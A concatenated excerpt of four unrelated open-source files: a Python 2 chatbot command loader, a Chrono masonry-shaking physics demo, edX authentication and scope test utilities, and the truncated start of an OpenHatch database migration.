# TODO - tell command to pass messages to other pypals. non conflicting. saves having to quit out of current one
# TODO - list commands
# TODO - learn from. quick command to copy commands between pypals may be useful. save moving between dirs and copying
# memory? - obj with funcitons for loading data etc.
# dictionary that stores object from _meta.json
o = None
# TODO - if current context is gone should be able to go through history
# MULTIPLE CONTEXT OBJECT MAY NEED TO EXISTS. searching for relevant ones is a requirement
context=None
# TODO - should every statement should carry certainty?. for now maybe store number 0-1 on here?
#certainty=0
# TODO third person, you, actor???... you can 'be' another person
#perspective={}
# the natural language processing engine. eventually will live on a brain object
nlp=None # TODO - should be an array
# natural language generation. used for output
nlg=None # TODO - as above
def __init__(self,data):
"""
data param is obj with unique name. i.e {'name':'pypal'}
"""
import json
with open("bin/%s/_meta.json" % data['name']) as json_file:
self.o = json.load(json_file)['object']
# TODO - externalise the class
self.nlp=NLP( self )
# TODO - externalise the class
self.nlg=NLG( self )
#self.context=Context( [self], [self] ) # talk to self
def introduce(self):
"""
introduce - when a pypal is first created this is what it says
"""
self.nlg.say( "Hi my name is %s, Thankyou for creating me!" % self.o['name'] )
self.listen()
def welcome(self):
"""
welcome - whenever you init a pypal
"""
self.nlg.say( "%s I see you have returned!" % self.o['friend'] )
# TODO - display stats?
self.listen()
# TODO - listen should really be an open stream at the moment this is just a friend channel.
# TODO - create channels for pypal>pyal comms
# TODO - event should be created
# TODO - should be having thoughts
def listen(self):
# NOTE - listen currently considers it to be friend who is talking
#self_obj = self.nlp.runWordAsFunction( 'bin/%s/brain/perception/self/' % self.o['name'], self.o['name'] )
#friend_obj = self.nlp.runWordAsFunction( 'bin/%s/brain/perception/physical/animal/human/' % self.o['name'], self.o['friend'] )
#friend_obj={}
try:
# THIS IS A APPARENTLY nix ONLY SOLUTION FOR AUTO PROCESSING
# IT WILL TIME OUT IF NO INPUT RESPONSE AND RUN AUTOMATIONS
# steps towards automation. I looked and using mulitprocessing and thread but non can stop a raw_input
# for now i'm doing this way just as I'm building some content bots and need it sorting
# the timeout for automation
#import signal
#signal.signal(signal.SIGALRM, self.automate)
#signal.alarm(10)
#from threading import Timer
#t=Timer(10,self.automate)
#t.start()
self.nlg.say( "I am listening..." )
import sys
from select import select
# TODO - keys presses should reset the timeout
timeout = 10000 # TODO - add to a pypal config?? - make timeout longer. for testing type automate. have flag/config for autobots?
rlist, _, _ = select([sys.stdin], [], [], timeout)
if rlist:
s = sys.stdin.readline().strip()
self.process(s)
self.listen()
else:
self.nlg.say( "No input. Automating..." ) # TODO - just run as bg proccess
self.automate()
self.listen()
return
# NOTE - DOESNT RUN ANYMORE
# NOTE - old way. preserving here for now until figure this all out
#self.nlg.say( "I am listening..." )
#information = raw_input("> ")
#self.process( information )
# TODO - parralell process for automation whilst listening?
except:
self.nlg.log( "FAIL :::::listen" )
def automate(self,*args,**kwargs):
"""
automate is a super simple task runner
it executes tasks listed in brain/automation/tasks.json
"""
self.nlg.log( "automate" )
try:
# add and run automation.py
path = 'bin/%s/brain/automation' % self.o['name']
import sys
sys.path.append( path )
task_runner = __import__( 'automate' )
task_runner.run(self,path)
except Exception:
self.nlg.log( "AUTOMATE FAIL!" )
# TODO - what when automations are complete?. currently returns to listening
#self.listen()
return
history=[] # TODO - should the history go on the context obj?
## TODO - this should be a HEAR function and should process chunks
# TODO - this is something that would be also good to parrallel process and decide which streams of informtion to listen to or ignore
def process(self,information,caller=None,callee=None):
self.context=Context( self, information ) # FOR NOW JUST FOR STORING PATHS
self.history.append(information)
# update the context object
#self.context=Context( [caller], [callee] )
# bust all into words, squash whitespace
words = information.split(None)
# if its a one letter answer. some helpers/shortcuts
if len(words)==1:
# added a repeat function
if information == 'r':
print self.history[len(self.history)-2]
self.process( self.history[len(self.history)-2] )
return
# show command history
if information == 'h':
for h in history:
print h
return
# TODO - some more 1 key helpers
# 'r' - repeat last command
# 'h' - history
# 'c' - show all available commands in pypal
self.nlp.processOneWord( information )
#self.listen()
return
self.nlp.processSentence( information )
#self.listen()
return
# TODO - need to ask meaning of words. to at least put it into memory for considering
# should also be able to check dictionary / nltk sources. but needs to build a program for the word
def ask_word_meaning(self,word):
self.nlp.say( "What is '%s'?" % word )
answer = raw_input("> ")
# TODO - NO - should probs be processess response
self.nlp.addNewWord( word, answer )
# when the bot is not active could explore data sources
# using a decorator pattern for behaviours on data
# def explore(self):
# TODO - let bot decide/choose which data source to consume
# TODO - can bot find new data sources? from interaction with other bots
# TODO - to begin with will attempt to buid knowledge graph data sets
# from webpages/ relational object maps from text
# can also explore things in the world
# theres various ways of determining what to explore in the world
# TODO - create a discover function?...
# do this by going into unknown. i.e. inventing urls to read.
# figure out how to chain commands?
# how to 'think of something to do'
# def spawn(self):
# def merge(self,pypal):
# the first job of the context object is to store caller, callee information
# Who is talking and who are they talking to
# NOTE / TODO - this may evolve with time
class Context(object):
"""
Context still to be fully defined.
Will hold things like conversation history and caller/callee information and is used to aid comprehension
not just personable but subject context
i.e. if i say show list, then add to list should add to the one ive shown
hmmmm caller callee is perspective and incorreclty stubbed here. probably why i removed
the implementation. unless perspective is an object that also resides in a context object?
NOW GIVES SOME PATH INFO. can access in a command like
o.context.COMMAND_PATH
Also forces app into running 1 command at a time. which is good. as thats how a brain kinda works.
you could probably still spin threads in commands if requried. but we context we have 1 train of thought which is the running command
"""
# both can be lists of animals
caller=None
callee=None
# useful for commands to know where they are loading from
# so can dump/store stuff there directly when scraping etc.
#BASEPATH = './bin/%s/brain/commands/add/grades/files3' % o.o['name']
#BASEPATH = './bin/%s/brain/commands/add/grades/files3' % o.o['name']
BASEPATH=''
# TODO - may move these 3 onto the NLP. and make context more of a caretaker pattern extended to surmise and store sessions.
LAST_COMMAND =''
COMMAND_PATH =''
#PARAMS=''
def __init__(self, parent, command, caller=None,callee=None):
# self.caller=caller
# self.callee=callee
self.BASEPATH = './bin/%s/brain/commands' % parent.o['name']
self.LAST_COMMAND = command
path = '/'.join( self.LAST_COMMAND.split(' ') )
file = '_'.join( self.LAST_COMMAND.split(' ') ) + '.py'
#self.COMMAND_PATH = '%s/%s/%s' % ( self.BASEPATH, path, file )
self.COMMAND_PATH = '%s/%s' % ( self.BASEPATH, path )
#self.PARAMS='' # NOTE - gets updated once string is parsed
class NLP(object):
"""
NLP are processes for word parsing. Generating functions for words.
Essentially a custom module loader
"""
owner=None
# TODO -
#TIME
#PLACE
#BASEPATH = './bin/%s/brain/commands/add/grades/files3' % o.o['name']
def __init__(self,owner):
self.owner=owner
def addNewWord( self, word, answer ):
# TODO - addNewWord. store what friend thinks/says it is
return
def processOneWord( self, word ):
"""
parse single word commands.
basically runs a command from the command folder
"""
#TODO - check that the word is clean
#TODO - see if we know the word
#TODO - deal with inuendo
#TODO - lemmatiser maybe required. or we re-routing manually?
knows_word=False;
c_path = 'bin/%s/brain/commands' % self.owner.o['name']
if self.has_command(c_path+"/"+word+"/"+word+".py"):
self.owner.nlg.log( "command detected" )
knows_word=True
return self.runWordAsFunction( c_path, word )
if knows_word == False:
self.owner.nlg.say( "I don't yet know that word" )
# now that we know input function we can run it..
# TODO - should probably create new problem though and process that way
# TODO - all the meta properties need updating
def runWordAsFunction(self,path,word):
import sys
sys.path.append( "%s/%s" % (path,word) )
try:
# TODO - check and update all the meta props
command_module = __import__( word )
reload(command_module) # reload class without restarting pypal
return command_module.run(self.owner)
except Exception, e:
self.owner.nlg.say( "Sorry, I can't do that, I tried but it didn't work" )
self.owner.nlg.log( "CHECK YOUR VIRUTAL ENVIRONMENT IS RUNNING." )
pass
# TODO - try to find the finite verb
# NOTE - AT THE MOMENT ONLY PROCESSING COMMANDS
def processSentence( self, sentence ):
# print "processSentence"
words = sentence.split(None)
word_count = len(words)
basepath = 'bin/%s/brain/commands' % self.owner.o['name']
word_path_arr=[]
# walk up the sentence
for word in words:
root = basepath+"/"+'/'.join(word_path_arr)
has_path = self.has_path( root +"/"+ word )
# if next word is the last word. check for a command and run it without params.
if (len(word_path_arr)+1)==word_count:
path = root+"/"+word
function = '_'.join( word_path_arr ) + "_" + word
if self.has_command(path+"/"+function+".py"):
return self.runSentenceAsFunction( path, function )
# if nowhere to go. but there's a command at current path. run it and pass the rest as param
if (False==has_path):
function = '_'.join( word_path_arr )
if self.has_command(root+"/"+function+".py"):
# get params by removing where we were up to
params = sentence.replace( ' '.join( word_path_arr ), '' )
# REMOVE THE WHITE SPACE FROM START OF PARAMS
params = params[1:]
# TODO - note. i see i built up to path to strip param. problem here is param is on the command_path. and doesn't get parsed off until here. during execution.
# TODO - will have a rethink about how want context to work before changing this. so for now will operate on the context obj here
# TODO - when doing change, nlp ref should probs get given to context. or context keeps them all in array.
self.owner.context.COMMAND_PATH = self.owner.context.COMMAND_PATH.replace( params, '' )
#self.owner.context.PARAMS = params
# TODO - throw error if no param is passed
if params == None or params == '':
print 'ERROR:parameter expected. none recieved'
# run the function
return self.runSentenceAsFunction( root, function, params )
else:
break
word_path_arr.append(word)
# TODO - if no command, attempt gnerating reponse from the self compiled programs.
# TODO - integrate memory, world states, schemas and emotions
# A LAD is a KAD : cognitive learning
return self.owner.nlg.say( "No command found" )
# params at the moment are 'rest of string'
# long term might break around finite verb and pass whole string?
def runSentenceAsFunction(self,path,function,params=None):
#print "runSentenceAsFunction"
#print path, function, params
import sys
sys.path.append( path )
try:
# TODO - check all the meta props
# TODO - may need to also write to some of the meta
# TODO - if no meta create a default one
command_module = __import__( function )
reload(command_module) # reload class without restarting pypal
if(params!=None):
return command_module.run(self.owner,params)
else:
return command_module.run(self.owner)
pass
except Exception, e:
self.owner.nlg.log( "runSentenceAsFunction FAIL!! \
\n happens when : \
\n failing code in the command. i.e imports used by the command not intalled \
\n venv not running \
\n not passing params when required" )
return False
#self.owner.listen()
pass
# run several possibilities. decide which is most relevant?
# the listener as to suppose an ontological truth in each word as they hear it
# when that doesn't happen even over sets of words things have to be considered
# and find more context or information. even lead to questioning
def suppose():
pass
## ---------------------------- NLP LANGUGAGE UTILS -----------------------------------
# check a lookup table of yes words. program needs to be able to expand that list
# TODO - if one word use lookup, else use NLTK sentimement tool
# NOTE - false DOES NOT MEAN it is negative, it could be neutral
def is_string_positive( s ):
pass
# check a lookup table of no words. program needs to be able to expand that list
# TODO - if one word use lookup, else use NLTK sentimement tool
# NOTE - false DOES NOT MEAN it is positive, it could be neutral
def is_string_negative( s ):
pass
# check a lookup table of
# TODO - building lookup tables on the fly is something we need to do
# RETURN THE NUMBER OR WORD FALSE
def is_string_number( s ):
# TODO - check if NLTK can do this
pass
def is_math_operator():
# TODO - check if NLTK can do this
pass
## ---------------------------- NLP FILE UTILS -----------------------------------
# TODO - may get rid of this lookup and have root words as delegators
def hasParams( self, path, word ):
"""
check if parameters True
"""
try:
#TODO - shoud just check if folder has param folder
import Program
program = Program.Program( path, word );
canHasParams = program.meta.get_property( 'rules', 'parameters' );
return canHasParams
except:
print "no meta or param found"
return False # force false if passing a non command. TODO- BUT. we shouldn't be calling if the case.
def has_path( self, path_to_directory ):
import os.path
return os.path.isdir(path_to_directory)
def has_command(self, path_to_py_file):
import os.path
return os.path.isfile(path_to_py_file)
class NLG(object):
"""
NLG - generates sentences in the natural language
at moment just logs strings to output.
from now on all output should come through here
"""
owner=None
def __init__(self,owner):
self.owner=owner
def say( self, words ):
"""
output helps distinguish pypals when in the console
"""
print "%s : %s" % ( self.owner.o['name'], words )
return
# TODO - setup python logger
# TODO - pass ref to pypal?
# TODO - logs should write to a file and be accessible by events. i.e. evt12345 - created variable xxx
def log( self, words ):
"""
log differs to the 'say' method.
log should be more about debugging.
say should be user comms
"""
return # NOTE <<<<<<<<<<<<<<<<<<<<<< im not running
# TOOD - if debug is true
import logging
logging.warning( "------------------------------------- %s : %s" % ( self.owner.o['name'], words ) )
return
|
gpl-2.0
|
tjolsen/chrono
|
src/demos/python/demo_masonry.py
|
2
|
8080
|
#-------------------------------------------------------------------------------
# Name: demo_masonry
#
# This file shows how to
# - create a small stack of bricks,
# - create a support that shakes like an earthquake, with imposed motion law
# - simulate the bricks that fall
# - output the postprocessing data for rendering the animation with POVray
#-------------------------------------------------------------------------------
#!/usr/bin/env python
def main():
pass
if __name__ == '__main__':
main()
# Load the Chrono::Engine unit and the postprocessing unit!!!
import ChronoEngine_python_core as chrono
import ChronoEngine_python_postprocess as postprocess
import ChronoEngine_python_irrlicht as chronoirr
# We will create two directories for saving some files, we need this:
import os
import math
# ---------------------------------------------------------------------
#
# Create the simulation system and add items
#
my_system = chrono.ChSystem()
# Set the default outward/inward shape margins for collision detection,
# this is epecially important for very large or very small objects.
chrono.ChCollisionModel.SetDefaultSuggestedEnvelope(0.001)
chrono.ChCollisionModel.SetDefaultSuggestedMargin(0.001)
# Maybe you want to change some settings for the solver. For example you
# might want to use SetMaxItersSolverSpeed to set the number of iterations
# per timestep, etc.
#my_system.SetSolverType(chrono.ChSolver.Type_BARZILAIBORWEIN) # precise, more slow
my_system.SetMaxItersSolverSpeed(70)
# Create a contact material (surface property)to share between all objects.
# The rolling and spinning parameters are optional - if enabled they double
# the computational time.
brick_material = chrono.ChMaterialSurface()
brick_material.SetFriction(0.5)
brick_material.SetDampingF(0.2)
brick_material.SetCompliance (0.0000001)
brick_material.SetComplianceT(0.0000001)
# brick_material.SetRollingFriction(rollfrict_param)
# brick_material.SetSpinningFriction(0)
# brick_material.SetComplianceRolling(0.0000001)
# brick_material.SetComplianceSpinning(0.0000001)
# Create the set of bricks in a vertical stack, along Y axis
nbricks_on_x = 1
nbricks_on_y = 6
size_brick_x = 0.25
size_brick_y = 0.12
size_brick_z = 0.12
density_brick = 1000; # kg/m^3
mass_brick = density_brick * size_brick_x * size_brick_y * size_brick_z;
inertia_brick = 2/5*(pow(size_brick_x,2))*mass_brick; # to do: compute separate xx,yy,zz inertias
for ix in range(0,nbricks_on_x):
for iy in range(0,nbricks_on_y):
# create it
body_brick = chrono.ChBody()
# set initial position
body_brick.SetPos(chrono.ChVectorD(ix*size_brick_x, (iy+0.5)*size_brick_y, 0 ))
# set mass properties
body_brick.SetMass(mass_brick)
body_brick.SetInertiaXX(chrono.ChVectorD(inertia_brick,inertia_brick,inertia_brick))
# set collision surface properties
body_brick.SetMaterialSurface(brick_material)
# Collision shape
body_brick.GetCollisionModel().ClearModel()
body_brick.GetCollisionModel().AddBox(size_brick_x/2, size_brick_y/2, size_brick_z/2) # must set half sizes
body_brick.GetCollisionModel().BuildModel()
body_brick.SetCollide(True)
# Visualization shape, for rendering animation
body_brick_shape = chrono.ChBoxShape()
body_brick_shape.GetBoxGeometry().Size = chrono.ChVectorD(size_brick_x/2, size_brick_y/2, size_brick_z/2)
if iy%2==0 :
body_brick_shape.SetColor(chrono.ChColor(0.65, 0.65, 0.6)) # set gray color only for odd bricks
body_brick.GetAssets().push_back(body_brick_shape)
my_system.Add(body_brick)
# Create the room floor: a simple fixed rigid body with a collision shape
# and a visualization shape
body_floor = chrono.ChBody()
body_floor.SetBodyFixed(True)
body_floor.SetPos(chrono.ChVectorD(0, -2, 0 ))
body_floor.SetMaterialSurface(brick_material)
# Collision shape
body_floor.GetCollisionModel().ClearModel()
body_floor.GetCollisionModel().AddBox(3, 1, 3) # hemi sizes
body_floor.GetCollisionModel().BuildModel()
body_floor.SetCollide(True)
# Visualization shape
body_floor_shape = chrono.ChBoxShape()
body_floor_shape.GetBoxGeometry().Size = chrono.ChVectorD(3, 1, 3)
body_floor.GetAssets().push_back(body_floor_shape)
body_floor_texture = chrono.ChTexture()
body_floor_texture.SetTextureFilename('../../../data/concrete.jpg')
body_floor.GetAssets().push_back(body_floor_texture)
my_system.Add(body_floor)
# Create the shaking table, as a box
size_table_x = 1;
size_table_y = 0.2;
size_table_z = 1;
body_table = chrono.ChBody()
body_table.SetPos(chrono.ChVectorD(0, -size_table_y/2, 0 ))
body_table.SetMaterialSurface(brick_material)
# Collision shape
body_table.GetCollisionModel().ClearModel()
body_table.GetCollisionModel().AddBox(size_table_x/2, size_table_y/2, size_table_z/2) # hemi sizes
body_table.GetCollisionModel().BuildModel()
body_table.SetCollide(True)
# Visualization shape
body_table_shape = chrono.ChBoxShape()
body_table_shape.GetBoxGeometry().Size = chrono.ChVectorD(size_table_x/2, size_table_y/2, size_table_z/2)
body_table_shape.SetColor(chrono.ChColor(0.4,0.4,0.5))
body_table.GetAssets().push_back(body_table_shape)
body_table_texture = chrono.ChTexture()
body_table_texture.SetTextureFilename('../../../data/concrete.jpg')
body_table.GetAssets().push_back(body_table_texture)
my_system.Add(body_table)
# Create a constraint that blocks free 3 x y z translations and 3 rx ry rz rotations
# of the table respect to the floor, and impose that the relative imposed position
# depends on a specified motion law.
link_shaker = chrono.ChLinkLockLock()
link_shaker.Initialize(body_table, body_floor, chrono.CSYSNORM)
my_system.Add(link_shaker)
# ..create the function for imposed x horizontal motion, etc.
mfunY = chrono.ChFunction_Sine(0,1.5,0.001) # phase, frequency, amplitude
link_shaker.SetMotion_Y(mfunY)
# ..create the function for imposed y vertical motion, etc.
mfunZ = chrono.ChFunction_Sine(0,1.5,0.12) # phase, frequency, amplitude
link_shaker.SetMotion_Z(mfunZ)
# Note that you could use other types of ChFunction_ objects, or create
# your custom function by class inheritance (see demo_python.py), or also
# set a function for table rotation , etc.
# ---------------------------------------------------------------------
#
# Create an Irrlicht application to visualize the system
#
myapplication = chronoirr.ChIrrApp(my_system)
myapplication.AddTypicalSky('../../../data/skybox/')
myapplication.AddTypicalCamera(chronoirr.vector3df(0.5,0.5,1.0))
myapplication.AddLightWithShadow(chronoirr.vector3df(2,4,2), # point
chronoirr.vector3df(0,0,0), # aimpoint
9, # radius (power)
1,9, # near, far
30) # angle of FOV
# ==IMPORTANT!== Use this function for adding a ChIrrNodeAsset to all items
# in the system. These ChIrrNodeAsset assets are 'proxies' to the Irrlicht meshes.
# If you need a finer control on which item really needs a visualization proxy in
# Irrlicht, just use application.AssetBind(myitem); on a per-item basis.
myapplication.AssetBindAll();
# ==IMPORTANT!== Use this function for 'converting' into Irrlicht meshes the assets
# that you added to the bodies into 3D shapes, they can be visualized by Irrlicht!
myapplication.AssetUpdateAll();
# If you want to show shadows because you used "AddLightWithShadow()'
# you must remember this:
myapplication.AddShadowAll();
# ---------------------------------------------------------------------
#
# Run the simulation
#
myapplication.SetStepManage(True)
myapplication.SetTimestep(0.001)
myapplication.SetTryRealtime(True)
while(myapplication.GetDevice().run()):
myapplication.BeginScene()
myapplication.DrawAll()
for substep in range(0,5):
myapplication.DoStep()
myapplication.EndScene()
|
bsd-3-clause
|
arbrandes/edx-platform
|
openedx/core/djangoapps/user_authn/tests/utils.py
|
4
|
9542
|
""" Common utilities for tests in the user_authn app. """
from datetime import datetime, timedelta
from enum import Enum
from unittest.mock import patch
import ddt
import pytz
from django.conf import settings
from oauth2_provider import models as dot_models
from rest_framework import status
from openedx.core.djangoapps.oauth_dispatch.adapters.dot import DOTAdapter
from openedx.core.djangoapps.oauth_dispatch.jwt import _create_jwt
from common.djangoapps.student.tests.factories import UserFactory
class AuthType(Enum):
session = 1
oauth = 2
jwt = 3
jwt_restricted = 4
JWT_AUTH_TYPES = [AuthType.jwt, AuthType.jwt_restricted]
def setup_login_oauth_client():
"""
Sets up a test OAuth client for the login service.
"""
login_service_user = UserFactory.create()
DOTAdapter().create_public_client(
name='login-service',
user=login_service_user,
redirect_uri='',
client_id=settings.JWT_AUTH['JWT_LOGIN_CLIENT_ID'],
)
def utcnow():
"""
Helper function to return the current UTC time localized to the UTC timezone.
"""
return datetime.now(pytz.UTC)
@ddt.ddt
class AuthAndScopesTestMixin:
"""
Mixin class to test authentication and oauth scopes for an API.
Test classes that use this Mixin need to define:
default_scopes - default list of scopes to include in created JWTs.
get_url(self, username) - method that returns the URL to call given
a username.
assert_success_response_for_student(resp) - method that verifies the
data returned in a successful response when accessing the URL for
self.student.
"""
default_scopes = None
user_password = 'test'
def setUp(self):
super().setUp()
self.student = UserFactory.create(password=self.user_password)
self.other_student = UserFactory.create(password=self.user_password)
self.global_staff = UserFactory.create(password=self.user_password, is_staff=True)
def get_response(self, auth_type, requesting_user=None, requested_user=None, url=None, token=None):
"""
Calls the url using the given auth_type.
Arguments:
- requesting_user is the user that is making the call to the url. Defaults to self.student.
- requested_user is user that is passed to the url. Defaults to self.student.
- url defaults to the response from calling self.get_url with requested_user.username.
- token defaults to the default creation of the token given the value of auth_type.
"""
requesting_user = requesting_user or self.student
requested_user = requested_user or self.student
auth_header = None
if auth_type == AuthType.session:
self.client.login(username=requesting_user.username, password=self.user_password)
elif auth_type == AuthType.oauth:
if not token:
token = self._create_oauth_token(requesting_user)
auth_header = f"Bearer {token}"
else:
assert auth_type in JWT_AUTH_TYPES
if not token:
token = self._create_jwt_token(requesting_user, auth_type)
auth_header = f"JWT {token}"
extra = dict(HTTP_AUTHORIZATION=auth_header) if auth_header else {}
return self.client.get(
url if url else self.get_url(requested_user.username),
**extra
)
def _create_oauth_token(self, user):
""" Creates and returns an OAuth token for the given user. """
dot_app_user = UserFactory.create(password=self.user_password)
dot_app = dot_models.Application.objects.create(
name='test app',
user=dot_app_user,
client_type='confidential',
authorization_grant_type='authorization-code',
redirect_uris='http://localhost:8079/complete/edxorg/'
)
return dot_models.AccessToken.objects.create(
user=user,
application=dot_app,
expires=utcnow() + timedelta(weeks=1),
scope='read write',
token='test_token',
)
def _create_jwt_token(self, user, auth_type, scopes=None, include_org_filter=True, include_me_filter=False):
""" Creates and returns a JWT token for the given user with the given parameters. """
filters = []
if include_org_filter:
filters += [f'content_org:{self.course.id.org}']
if include_me_filter:
filters += ['user:me']
if scopes is None:
scopes = self.default_scopes
return _create_jwt(
user,
scopes=scopes,
is_restricted=(auth_type == AuthType.jwt_restricted),
filters=filters,
)
def _assert_in_log(self, text, mock_log_method):
assert mock_log_method.called
assert text in mock_log_method.call_args_list[0][0][0]
def test_anonymous_user(self):
resp = self.client.get(self.get_url(self.student.username))
assert resp.status_code == status.HTTP_401_UNAUTHORIZED
@ddt.data(*JWT_AUTH_TYPES)
def test_self_user(self, auth_type):
resp = self.get_response(auth_type)
assert resp.status_code == status.HTTP_200_OK
self.assert_success_response_for_student(resp)
@ddt.data(*list(AuthType))
def test_staff_user(self, auth_type):
resp = self.get_response(auth_type, requesting_user=self.global_staff)
assert resp.status_code == status.HTTP_200_OK
self.assert_success_response_for_student(resp)
@ddt.data(*list(AuthType))
def test_inactive_user(self, auth_type):
self.student.is_active = False
self.student.save()
resp = self.get_response(auth_type)
assert resp.status_code == status.HTTP_200_OK
@patch('edx_rest_framework_extensions.permissions.log')
@ddt.data(*list(AuthType))
def test_another_user(self, auth_type, mock_log):
"""
Returns 403 for OAuth, Session, and JWT auth with IsUserInUrl.
Returns 200 for jwt_restricted and user:me filter unset.
"""
resp = self.get_response(auth_type, requesting_user=self.other_student)
# Restricted JWT tokens without the user:me filter have access to other users
expected_jwt_access_granted = auth_type == AuthType.jwt_restricted
assert resp.status_code == (status.HTTP_200_OK if expected_jwt_access_granted else status.HTTP_403_FORBIDDEN)
if not expected_jwt_access_granted:
self._assert_in_log("IsUserInUrl", mock_log.info)
@patch('edx_rest_framework_extensions.permissions.log')
@ddt.data(*JWT_AUTH_TYPES)
def test_jwt_no_scopes(self, auth_type, mock_log):
""" Returns 403 when scopes are enforced with JwtHasScope. """
jwt_token = self._create_jwt_token(self.student, auth_type, scopes=[])
resp = self.get_response(AuthType.jwt, token=jwt_token)
is_enforced = auth_type == AuthType.jwt_restricted
assert resp.status_code == (status.HTTP_403_FORBIDDEN if is_enforced else status.HTTP_200_OK)
if is_enforced:
self._assert_in_log("JwtHasScope", mock_log.warning)
@patch('edx_rest_framework_extensions.permissions.log')
@ddt.data(*JWT_AUTH_TYPES)
def test_jwt_no_filter(self, auth_type, mock_log):
""" Returns 403 when scopes are enforced with JwtHasContentOrgFilterForRequestedCourse. """
jwt_token = self._create_jwt_token(self.student, auth_type, include_org_filter=False)
resp = self.get_response(AuthType.jwt, token=jwt_token)
is_enforced = auth_type == AuthType.jwt_restricted
assert resp.status_code == (status.HTTP_403_FORBIDDEN if is_enforced else status.HTTP_200_OK)
if is_enforced:
self._assert_in_log("JwtHasContentOrgFilterForRequestedCourse", mock_log.warning)
@ddt.data(*JWT_AUTH_TYPES)
def test_jwt_on_behalf_of_user(self, auth_type):
jwt_token = self._create_jwt_token(self.student, auth_type, include_me_filter=True)
resp = self.get_response(AuthType.jwt, token=jwt_token)
assert resp.status_code == status.HTTP_200_OK
@patch('edx_rest_framework_extensions.permissions.log')
@ddt.data(*JWT_AUTH_TYPES)
def test_jwt_on_behalf_of_other_user(self, auth_type, mock_log):
""" Returns 403 when scopes are enforced with JwtHasUserFilterForRequestedUser. """
jwt_token = self._create_jwt_token(self.other_student, auth_type, include_me_filter=True)
resp = self.get_response(AuthType.jwt, token=jwt_token)
assert resp.status_code == status.HTTP_403_FORBIDDEN
if auth_type == AuthType.jwt_restricted:
self._assert_in_log("JwtHasUserFilterForRequestedUser", mock_log.warning)
else:
self._assert_in_log("IsUserInUrl", mock_log.info)
def test_valid_oauth_token(self):
resp = self.get_response(AuthType.oauth)
assert resp.status_code == status.HTTP_200_OK
def test_invalid_oauth_token(self):
resp = self.get_response(AuthType.oauth, token="fooooooooooToken")
assert resp.status_code == status.HTTP_401_UNAUTHORIZED
def test_expired_oauth_token(self):
token = self._create_oauth_token(self.student)
token.expires = utcnow() - timedelta(weeks=1)
token.save()
resp = self.get_response(AuthType.oauth, token=token)
assert resp.status_code == status.HTTP_401_UNAUTHORIZED
|
agpl-3.0
|
moijes12/oh-mainline
|
mysite/search/migrations/0033_search_lots_of_stuff.py
|
17
|
9315
|
# This file is part of OpenHatch.
# Copyright (C) 2010 OpenHatch, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from south.db import db
from django.db import models
from mysite.search.models import *
class Migration:
def forwards(self, orm):
# Adding model 'ProjectInvolvementQuestion'
db.create_table('search_projectinvolvementquestion', (
('id', orm['search.projectinvolvementquestion:id']),
('text', orm['search.projectinvolvementquestion:text']),
('project', orm['search.projectinvolvementquestion:project']),
))
db.send_create_signal('search', ['ProjectInvolvementQuestion'])
# Adding model 'Answer'
db.create_table('search_answer', (
('id', orm['search.answer:id']),
('text', orm['search.answer:text']),
('author', orm['search.answer:author']),
('question', orm['search.answer:question']),
))
db.send_create_signal('search', ['Answer'])
# Changing field 'Project.cached_contributor_count'
# (to signature: django.db.models.fields.IntegerField(default=0, null=True))
db.alter_column('search_project', 'cached_contributor_count', orm['search.project:cached_contributor_count'])
def backwards(self, orm):
# Deleting model 'ProjectInvolvementQuestion'
db.delete_table('search_projectinvolvementquestion')
# Deleting model 'Answer'
db.delete_table('search_answer')
# Changing field 'Project.cached_contributor_count'
# (to signature: django.db.models.fields.IntegerField())
db.alter_column('search_project', 'cached_contributor_count', orm['search.project:cached_contributor_count'])
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'search.answer': {
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.ProjectInvolvementQuestion']"}),
'text': ('django.db.models.fields.TextField', [], {})
},
